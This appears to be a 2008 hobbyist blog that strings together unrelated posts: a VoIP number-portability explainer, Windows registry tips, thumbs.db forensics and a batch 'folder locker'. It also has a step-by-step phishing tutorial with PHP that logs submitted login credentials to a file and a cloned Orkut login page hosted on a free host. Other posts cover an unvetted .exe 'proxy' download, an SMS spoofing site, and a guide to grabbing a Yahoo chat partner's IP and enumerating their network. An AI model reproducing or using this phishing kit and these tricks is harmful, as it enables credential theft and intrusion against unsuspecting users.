Mobile number portability (MNP) also impacts the internet telephony, or VOIP (Voice over IP) business. A voice call originated in the VOIP environment which is routed to a mobile phone number of a traditional mobile carrier also face challenges to reach its destination in case the mobile phone number is ported. Mobile number portability is a service that makes it possible for subscribers to keep their existing mobile phone number when changing the service provider (or mobile operator).

VoIP is clearly identified as a Least Cost Routing (LCR) voice routing system, which is based on checking the destination of each telephone call as it is made, and then sending the call via the network that will cost the customer the least. With GSM number portability now in place, LCR providers can no longer rely on using the network root prefix to determine how to route a call. Instead, they now need to know the actual current network of every number before routing the call.

Therefore, VoIP solutions also need to handle MNP when routing a voice call. In countries without a central database like UK it might be necessary to query the GSM network about the home network a mobile phone number belongs to. As VoIP starts to take off in the enterprise markets because of least cost routing options, it needs to provide a certain level of reliability when handling calls.

MNP checks are important to assure that this quality of service is met; by handling MNP lookups before routing a call and assuring that the voice call will actually work, VoIP companies give businesses the necessary reliability they look for in an internet telephony provider. UK-based messaging operator Tyntec provides a Voice Network Query service, which helps not only traditional voice carriers but also VoIP providers to query the GSM network to find out the home network of a ported number.

In countries such as Singapore, the most recent Mobile number portability solution is expected to open the doors to new business opportunities for non-traditional telecommunication service providers like wireless broadband providers and voice over IP (VoIP) providers.

In November 2007, the Federal Communications Commission in the United States released an order extending number portability obligations to interconnected VoIP providers and carriers that support VoIP providers.


*Mobile phones and hand-held devices

Telcos and consumers have invested billions of dollars in mobile phone equipment. In developed countries, mobile phones have achieved nearly complete market penetration, and many people are giving up landlines and using mobiles exclusively. Given this situation, it is not entirely clear whether there would be a significant higher demand for VoIP among consumers until either public or community wireless networks have similar geographical coverage to cellular networks (thereby enabling mobile VoIP phones, so called WiFi phones or VoWLAN) or VoIP is implemented over 3G networks. However, "dual mode" telephone sets, which allow for the seamless handover between a cellular network and a WiFi network, are expected to help VoIP become more popular.[12]

Phones like the NEC N900iL, and later many of the Nokia Eseries and several WiFi enabled mobile phones have SIP clients hardcoded into the firmware. Such clients operate independently of the mobile phone network unless a network operator decides to remove the client in the firmware of a heavily branded handset. Some operators such as Vodafone actively try to block VoIP traffic from their network[13] and therefore most VoIP calls from such devices are done over WiFi.

Several WiFi only IP hardphones exist, most of them supporting either Skype or the SIP protocol. These phones are intended as a replacement for PSTN based cordless phones but can be used anywhere where WiFi internet access is available.

Another addition to hand held devices are ruggedized bar code type devices that are used in warehouses and retail environments. These type of devices rely on "inside the 4 walls" type of VoIP services that do not connect to the outside world and are solely to be used from employee to employee communications.

Wednesday, August 20, 2008

Phishing Tutorials

Ok so first:



1- Go take the source of the website you want to phish.



2-When you got it, create on your desktop a file named index.txt

in that one, you will paste the source.



3- verify that all the images and other files like javascript and css are linked to the originale website. so if the website is

CODE
http://www.website.com/file.html
, copy
CODE
http://www.website.com/

before all other files that you find. so if an image is image/poo.gif, it should be



4- after all that is done, change the .txt extension to .htm or .html
and verify the website looks the same. if it doesnt, it is maybe
because the css contains images. then you would need to download the
css, and make the same process as 3rd step.



Not that if you upload the new css on ur host, you dont need to put the
real host in front of it. if it is in the same path as index.html, you
can let is as stylesheet.css or whatever it is




5-make a file named post.txt and add the following content in it:


PHP Code:
CODE

header ('Location: [url="http://THE"]http://THE[/url] ORIGINAL WEBSITE HERE ');

$handle = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>


change the extension .txt to .php. after that, you need to
gochange the place where the html file send the information. so open
your index.html with notepad and search action=. after u found it,
change the content in the " " to post.php.



6-now simply create file name log.txt where alll password of phished material will come




Now U Need A Host i prefer by way freehostia.com

How To Register and Upload Their



1 First Goto This url
CODE
http://freehostia.com/signup.html


And Register for a free account their.In The Domain Name Select Use a subdomain.

2 Login To Your Cpanel And select Site Management

Reduced: 50% of original size [ 1018 x 239 ] - Click to view full image


3 Now Select File Manage

Reduced: 50% of original size [ 1015 x 283 ] - Click to view full image


4 Now Click Your Domain Name (Wait For some minutes If the Url is Not listed)

Reduced: 68% of original size [ 748 x 382 ] - Click to view full image


5 Select browse And Uplaod all The Files

Reduced: 73% of original size [ 696 x 329 ] - Click to view full image


6 I Have taken Example Of Orkut Fake Login Page


get The Url Of the .html Page

like This (Your Domain name).freehostia.com/orkut.html

Reduced: 72% of original size [ 709 x 332 ] - Click to view full image


7 A new .TXT file will appear in the Directory were u have Uploaded all the files Cointaing
The login imformation

Reduced: 74% of original size [ 683 x 367 ] - Click to view full image



7 Now Check the Box near Logins and select permission 700 and click change

Reduced: 72% of original size [ 707 x 334 ] - Click to view full image


Thats All Happy Hacking

Self Made Tutorial Say Thanks If u Like It

Fast Proxy

Presenting And Unlimited Fast Proxy For You Guise To Surf Anonymously Around The Net . They Are Very Fast And Unblocks All Softwares And Sites

*****************************

Download:
CODE
http://rapidshare.com/files/114653845/U89.exe


Found It While Surfing biggrin.gif

Tuesday, August 19, 2008

Convert an IP address to an IP Number

Convert an IP address to an IP Number

IP address (IPv4 / IPv6) is divided into 4 sub-blocks. Each sub-block has a different weight number each powered by 256. IP number is being used in the database because it is efficient to search between a range of number in database.

Beginning IP number and Ending IP Number are calculated based on following formula:

IP Number = 16777216*w + 65536*x + 256*y + z (Formula 1)

where
IP Address = w.x.y.z

For example, if IP address is "202.186.13.4", then its IP Number "3401190660" is based on the Formula 1.

IP Address = 202.186.13.4

So, w = 202, x = 186, y = 13 and z = 4

IP Number = 16777216*202 + 65536*186 + 256*13 + 4
= 3388997632 + 12189696 + 3328 + 4
= 3401190660

To reverse IP number to IP address,

w = int ( IP Number / 16777216 ) % 256
x = int ( IP Number / 65536 ) % 256
y = int ( IP Number / 256 ) % 256
z = int ( IP Number ) % 256

where % is the mod operator and int is return the integer part of the division.

Demystify “thumbs.db”

Demystify “thumbs.db”

Are you working as a cyber crime investigator and looking for something which can prove in court of law that there was some pornographic content on the suspect’s machine? Let me help you out in this case.There is a file with a name “thumbs.db” which is automatically generated by Windows XP whenever user views the folder or image in thumbs view or in filmstrip view. Automatic generation of this file is ON by default. Thumbs.db contains a copy of each of the tiny preview images generated for image files in that folder so that they load up quickly the next time you browse that folder. If a user tries to view this file by any image viewer then it will be of no use. For extracting the juicy content from this file, forensic investigator has to understand the header of the thumbs file present in thumbs.db. Let me explain step by step on how to extract useful content from thumbs.db file.

Open any folder which has got some jpeg files and make that folder view in thumbs view as shown in

http://2.bp.blogspot.com/_kEJJtYsk89Q/SHuoc0ClK1I/AAAAAAAAAQQ/zCYf8K2-ez4/s320/fig1.JPG

As soon as the folder is kept in thumbs view “thumbs.db” file is created. Even if all JPEG files are deleted and thumbs.db file corresponding to those JPEG files is present, then also you can see the images but they will be very small in size. Thumbs.db which was created is now viewed using winhex. Once the file has been opened in winhex view, we will search and select for particular header. Header is “ÿØÿà JFIF” and its hex values are “FFD8FFE000104A464946″. This is shown in an example :-

http://3.bp.blogspot.com/_kEJJtYsk89Q/SHupjF2pUtI/AAAAAAAAAQg/xcYNtEqSxE0/s400/fig2.JPG

Copy the entire content in a notepad where the header is starting till the end of the file and save the file with the extension JPEG. You can now easily view the extracted content with any of the image viewer. If there are large number of headers in thumbs.db file, then you can use professional tool like “Windows File Analyzer” to see the contents of thumbs.db file.

WEBSITE OF CYBER CRIME CELL MUMBAI

WEBSITE OF CYBER CRIME CELL MUMBAI

Install OS on your Pendrive.......

is possible to install OS on your Pen Drive...but u dosent mentioned which OS u want to install on your pen Drive....

Thr r lots of Operating System that can be install on your pen drive without much efforts... Here I'm providing u a brief introduction and direct link to download "Damn Small Linux" Operating System..

"Damn Small Linux" also refer as "DSL" is a Linux distribution operating system that was developed to run even on lower specification systems, including computers which would otherwise go out of use. This distribution is this much small that it can fit inside a 50MB live CD or on any USB Pendrive larger then 64MB.

Feature:--
Boot from a business card CD as a live linux distribution (LiveCD)
Boot from a USB pen drive
Boot from within a host operating system (that's right, it can run *inside* Windows)
Run very nicely from an IDE Compact Flash drive via a method we call "frugal install"
Transform into a Debian OS with a traditional hard drive install
Run light enough to power a 486DX with 16MB of Ram
Run fully in RAM with as little as 128MB (you will be amazed at how fast your computer can be!)
Modularly grow -- DSL is highly extendable without the need to customize


Download Link:-- http://iso.linuxquestions.org/download/http/distro.ibiblio.org/dsl-3.3.iso
(Alternate link)
http://iso.linuxquestions.org/download/ftp/ftp.belnet.be/dsl-3.3.iso
http://iso.linuxquestions.org/download/http/mirrors.alien2thisworld.net/dsl-3.3.iso
http://iso.linuxquestions.org/download/http/distro.ibiblio.org/dsl-3.3.iso



How To install on your Pen Drive:-- http://www.pendrivelinux.com/2007/01/02/all-in-one-usb-dsl/

pypiyu......

password protect ur folders using simple trick!!!!!!!!

lock, hide & password protect ur folders!!!!!!!!

trick to lock folder
using this trick not only for locking folder but also hide it....

copy following script:-


cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==
type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


now go for following few steps
1.paste above text into notepad.
2.the text which is written in
pink letters delete it & type u r password there.
3.save that file by extension .bat ( name is ur choice)
4.now on ur screen there is a bat file appear.
5.double click on that file.
6.a new folder named
locker will appear on the screen.
7.keep the files and folders u want to lock in that
locker folder.
8.now again double click on that batch file to lock that
locker folder.
9.after locking that folder it will become hidden.
10.to open that folder double click on that bat file
11.type ur password & open that folder.

plz reply ur experience........



If ur data will be lost its easy to get this back...........

1. just copy the script from here again.
2. make the batch file again in the same location.
3. and if u have remembered the password then edit password in the program.
4. double click on the batch file & u will get the options back to recover ur data.

SOME TRICKS 2

Easy Access to Folders from the Toolbar

You can quickly access commonly used folders from your Toolbar
Right click on an open area of the Toolbar
Select Toolbars / New Toolbar
Browse to the directory you want to add
Now on the toolbar you will see the name of that folder displayed.
Click on the >> to open any sub-folders as well.
Organizing the Start / Programs Listing

As you add more and more programs, the listing of them in Start / Programs can get fairly long.One solution is to categorize your programs into several groups, create a folder for those groups, and move the shortcuts to those folders.
For example:
Start the Explorer
Go to Windows / Start Menu / Programs
Create new folders with the categories you want (e.g. Graphics, Utilities, Internet etc.)
Now move the shortcuts to those programs in Windows / Start Menu / Programs to whichever category you decide.
This can greatly reduce clutter and make it a lot easier to find your programs.
Note: Windows2000 and WindowsXP Users will need to go to the C:\Documents and Settings\All Users\Start Menu\Programs directory


Restoring a Lost Desktop

If you ever lose the Desktop but Explorer is still running with the Start Button, you can do this to bring back your Desktop in a Windows box.
Click Start
Click Run
Type a period " . "
Then press Enter
Submitted by

Creating a New E-Mail Shortcut

To create a shortcut that will open your default e-mail program starting a new e-mail,
Right click on an open area of the desktop
Select New / Shortcut
For the Command Line, enter mailto:
For the title enter something like New E-Mail
When you click on this your default e-mail program should start with a new e-mail form.

Creating 3D Window Effect

You can create a nice 3D effect for your windows
Start Regedit
Go to HKEY_CURRENT_USER \ Control Panel \ Colors
Make sure the following setting are there:
ButtonHilight=128 128 128
ButtonShadow=255 255 255


Creating Shutdown, Restart and Logoff Icons

To create the icons, create a shortcut on the desktop.
For Shutdown, the command is C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows
For Restart, the command is C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexec
For Logoff, the command is C:\WINDOWS\RUNDLL.EXE shell32.dll,SHExitWindowsEx 0

Having your Favorites and Start Menus Sort Alphabetically


If your Start Menu Program or Favorites are not sorting alphabetically, it is easy to fix this:
Start Regedit
Go to HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/MenuOrder
Under here is are Favorites and Start Menu folders
In each there is a value called Order
Simply delete (or rename this) and restart Winodws
Your Favorites or Start Menus should now sort alphabetically

Increasing the Icon Cache

Run Regedit
Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer
Create a new string called Max Cached Icons
Give it a value of 10000
This will increase response time in windows and give the Shellicon cache file more elbow room.

Make Icons 256 Color 16-Bit

Open the Registry
Hit Ctrl+F
Type Shell Icon BPP
When found, right click the Shell Icon BPP icon
Click Modify
Change the value from 4 to 16
Click Ok
Close the registry
Restart your computer

Removing Shortcut Arrows

An easy way to remove those irritating arrows from your desktop shortcut icons and not change their properties
Right click the Desktop / Properties / Appearance tab
Select Item
Scroll for Icon
The default size is 32
Change this to 30
Clicking Apply

Adding the Control Panel to the Start Menu

Open up the Explorer
Go to \WINDOWS\Start Menu
Right click in the right-hand panel
Add a new folder
Name it Control Panel.{21ec2020-3aea-1069-a2dd-08002b30309d}
This makes getting to the Control Panel items a little easier

Making Desktop Changes Permanent

To make changes to the Desktop like window size, positon after rebooting:
Start Regedit
Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Create a New Binary Value
Name it NoSaveSettings
Give it a value of 01 00 00 00
Easy Shortcuts on the Desktop

Here is an easy way to put shortcuts on the Desktop where they can easily be moved to other group icons.
Using the Explorer, create a SHORTCUT to the \Windows\Desktop directory in your \Windows\SEND TO directory.
Now whenever you want to make a shortcut and move it to the desktop:
Just make the shortcut you want using Explorer
Right click on that shortcut
In the pop up menu select the Send To and Desktop shortcut

Sms spoofing

www.sharpmail.co.uk chek this site for sms spoofing


PYPIYU.............

SOME TRICKS

Allowing Network Access with Blank Passwords (XP and Vista)

Although you can log in locally without a password, by default, WindowsXP Pro does not allow network users to access the computer without a password. Typically you will receive an Unknown error 31 if this is the case.
To change this setting:
Run gpedit.msc
Go to Computer Configuration / Windows Settings / Security Settings / Local Policies / Security Options
Double click on Accounts: Limit local account use of blank passwords to console login only
Disable this option
Disabling the F3 Search Key


If you want to disable the ability to use the F3 key from either the Windows Explorer or Internet Explorer
Start Regedit
Go to HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions
Create a Dword value called NoFindFiles
Give it a value of 1
Reboot
Preventing Changes to File Associations

You can prevent users from changing associations via Windows Explorer's Tools / Folder Options / File Types tab.
Start Regedit
Go to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explore
Create REG_DWORD data type NoFileAssociate
Give it a value of 1
Submitted by Paul Barker
Locking File Associations

If you have your file associations the way you want for a particular file type, you can remove it from the list that gets displayed in the Folder Options / File Types screen
Start Regedit
Go to HKEY_CLASSES_ROOT
Scroll to the file association you want to lock.
In the right panel, create a new Binary value
Call it EditFlags
Give it a value of 01 00 00 00
Now when you go to the Folder Options / File Types screen, you won't see that file type listed.
Submitted by Paul Barker

Turning off System Beeps

If you want to turn off all system beeps (like the ones that go through your computers' internal speaker):
Start Regedit
Go to HKEY_CURRENT_USER\Control Panel\Sound
Edit the key Beep and give it a value of No
Download reg file

Changing the Location Of Special Folders


You can modify the registry to change the location of special folders like:
My Documents
Favorites
My Pictures
Personal
Start Regedit
Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Double click on any locations you want to change and alter the path
Logoff or restart for the changes to go into effect
Note: TweakUI from Microsoft will allow you to make these changes from a dialog box as well

Deleting Specific Registry Value

In a previous tip, Automatically Deleting a Registry Key, it was mentioned how to remove an entire registry key.If you want to simply remove a specific value within a key, use the syntax below:
[Registry Key]"value"=-
For example:
REGEDIT4[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "MSConfig"=-
would delete the value MSCONFIG.
Submitted by Brent Towsley

Setting the Recycle Bin to Always Delete

You can set the recycle bin to always delete items (like holding down the shift key when dragging files to the recycle bin)
Start Regedit
Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ BitBucket
Set the key NukeOnDelete to 1
Download reg file

Setting the Internet Explorer Home Page

If you want to set the home page used by Internet Explorer through the registry
Start Regedit
Go to HKey_Current_User \ Software \ Microsoft \ Internet Explorer \ Main
Give the Start Page key the string value you wish set as homepage
Submitted by Austin Henderson

Preparing to Move Hard Drive to Another Computer

To remove the devices from device manager when taking a HD from one computer to another,simply:
Run Regedit
Go to HKEY_LOCAL_MACHINE\ and delete the Enum section
This removes all of the hardware specific settings
Submitted by Lee Berry

Comparing Registries

While working with changes to your system, you might want to see what is changing in your Registry.Since you can export it to a text file, the steps are fairly easy
Start Regedit
With the very top level select - My Computer, on the Toolbar select Registry / Export Registry File
I usually save it to the root of the C: drive with the name before (you don't need to add an extension)
Make the change to your system
Go back to Regedit
Press F5 to update it
Export the Registry like step 2
Name the file after and have it go in the same directory
Open up a DOS window
Go to the directory where the two exported files are
Enter FC before.reg after.reg > diff.txt
Then you can edit diff.txt with your favorite text editor.
Note: I do the last steps so often I have a simple batch file already set up.

Hack Yahoo Acoount While Chatting!!

Ok Before We get Started This Is not My page I also Recommend this Site http://crack0hack.wetpaint.com

Im also not Sure If this Works Hundred Percent

1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio

1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->

2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED


3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1e> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

Ok so you will ask now what next???
No you find what you can do with this network than me explaining everything.
so post ur comments and lemme know....

So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.